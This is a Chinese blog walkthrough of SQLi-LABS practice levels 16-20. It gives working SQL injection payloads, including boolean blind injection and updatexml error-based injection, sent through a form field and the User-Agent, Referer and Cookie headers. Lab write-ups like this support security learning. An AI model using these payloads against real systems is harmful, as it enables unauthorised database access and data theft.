SQLi-LABS通关攻略【16-20关】

最新推荐文章于 2024-09-25 09:21:39 发布
最新推荐文章于 2024-09-25 09:21:39 发布
阅读量302 收藏 3
点赞数 5
分类专栏: SQLi-LABS通关攻略 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141398712
版权

SQLi-LABS 16关 

1.测试闭合方式

?id=1                         //错误

?id=1'                        //错误

?id=1' or 1=1 #         //错误

?id=1" or 1=1 #         //错误

?id=1") or 1=1 #        //正确

所以闭合方式是 ") #

 

2.在进行列数判断时,发现该网站只有正确和错误两个页面,所以这里选择布尔盲注进行注入

布尔盲注可以使用抓包爆破,也可以使用ascii进行二分法,这里使用二分法得到数据库名为security

1") or 1=1 and ascii(substr(database(),1,1))=115#

 

SQLi-LABS 17关

1.该关是修改密码的界面,查看源码得到用户一栏不能进行注入,所以要在新密码处进行注入

2.在新密码一栏进行闭合方式测试

1'     //错误

1' #  //正常

所以是'#闭合方式

3.发现在测试是会报错,所以使用报错注入

1' and updatexml(1,concat(1,(select database())),1) #

得到数据库security

 

SQLi-LABS 18关

1.该关在输入正确用户密码时,返回了U-A头

这关使用bp抓包进行U-A头注入,在U-A头输入单引号后,显示报错,所以使用报错注入

2.判断闭合方式

再进行常规闭合方式测试之后,发现都无法闭合,在查看源代码后,得到需要使用 and'进行闭合

3..报错注入语句

' and updatexml(1,concat(1,(select database())),1) and '

得到数据库名为security

SQLi-LABS 19关

本关和第十八关一样都都需要使用bp抓包进行报错注入,只是这里需要在referer报头进行注入

注入语句

' and updatexml(1,concat(1,database()),1) and '

 

SQLi-LABS 20关

1.本关是进行cookie报头注入,再输入一个用户密码后会显示你的cookie

2.进行bpbp抓包发送到重放器里,如下图所示

3.在cookie报头进行注入发现依旧是报错注入

注入语句:

' and updatexml(1,concat(1,database()),1) and '

得到数据库名security

Zhong-Xin
关注
专栏目录
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLi-LABS通关攻略【26-30
qq_65852138的博客
08-25 667
SQLi-LABS通关攻略【26-30
sqli-labs通关攻略
网安小白
07-22 370
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
sqli-labs靶场通关攻略
test_zpx的博客
08-14 466
Good Good Study,Day Day Up!
sqli-labs通关(1-20
weixin_57827781的博客
05-18 1570
较为详细的介绍了sqli-labs靶场的操作以及实验过程,更好的学习sql注入
sqli-labs通关攻略(全卡)(更新中~)
C233333235的博客
07-22 669
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开卡,提示我们将参数id填入url中。
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2216
本文章主要是sqli-labs靶场1-20通关方法
sqli-labs靶场通关攻略16-20
Nai_zui_jiang的博客
08-21 1487
")")
sqli-labs通关教程
m0_65150886的博客
01-23 1628
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs 通关手册
ttytaaa的博客
05-18 1418
(length(database())) =9 or if(1=1, sleep(3), null) or '1' = '1 #'语句中三个条件都为逻辑或 当第一个条件不成功时,再执行第二个条件,第二个条也不成功时,则执行第三个。(length(database())) =9 条件不成功,而后执行了 if(1=1, sleep(3), null)条件,该条件中的判断为 1=1,结果永远都是为真的,而后执行 sleep(3),最终页面响应时间是 3 秒。1一个新的类型注入,使用?
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1434
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 735
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1905
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs-master超详细通关教程(1-23基础篇)
m0_67391270的博客
06-12 3283
一到四主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
Online DDL (Data Definition Language)
09-23 278
MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
Postgresql特殊键字
最新发布
czjnoe的博客
09-25 299
表字段名称如果出现这些特殊键字,则需要通过单引号访问字段,如offset、group。PostgreSQL特殊键字。
基于JavaWeb开发的Java+SpringMvc+vue+element实现驾校管理系统详细设计
央顺科技官方博客
09-24 951
机遇与挑战始终并存。在开放的互联网平台面前,驾校预约管理系统的信息管理面临着巨大的挑战。传统的管理模式局限于简单数据的管理,无法适应不断变化的市场格局。在早期阶段,在将计算机技术和网络技术融入驾校预约管理系统数据管理方法之前,所有管理方式都通过人工操作完成了管理信息的。系统管理也都将通过计算机进行整体智能化操作,对于驾校预约管理系统所牵扯的管理及数据保存都是非常多的,举例像所有详细信息包括,管理员;首页、个人中心、学员管理、驾校教练管理、驾校车辆管理、预约管理、取消预约管理、驾校公告管理、系统管理。
sqli-labs通关28
03-05
通关28其中的一个卡,下面是sqli-labs通关28的介绍: 在sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值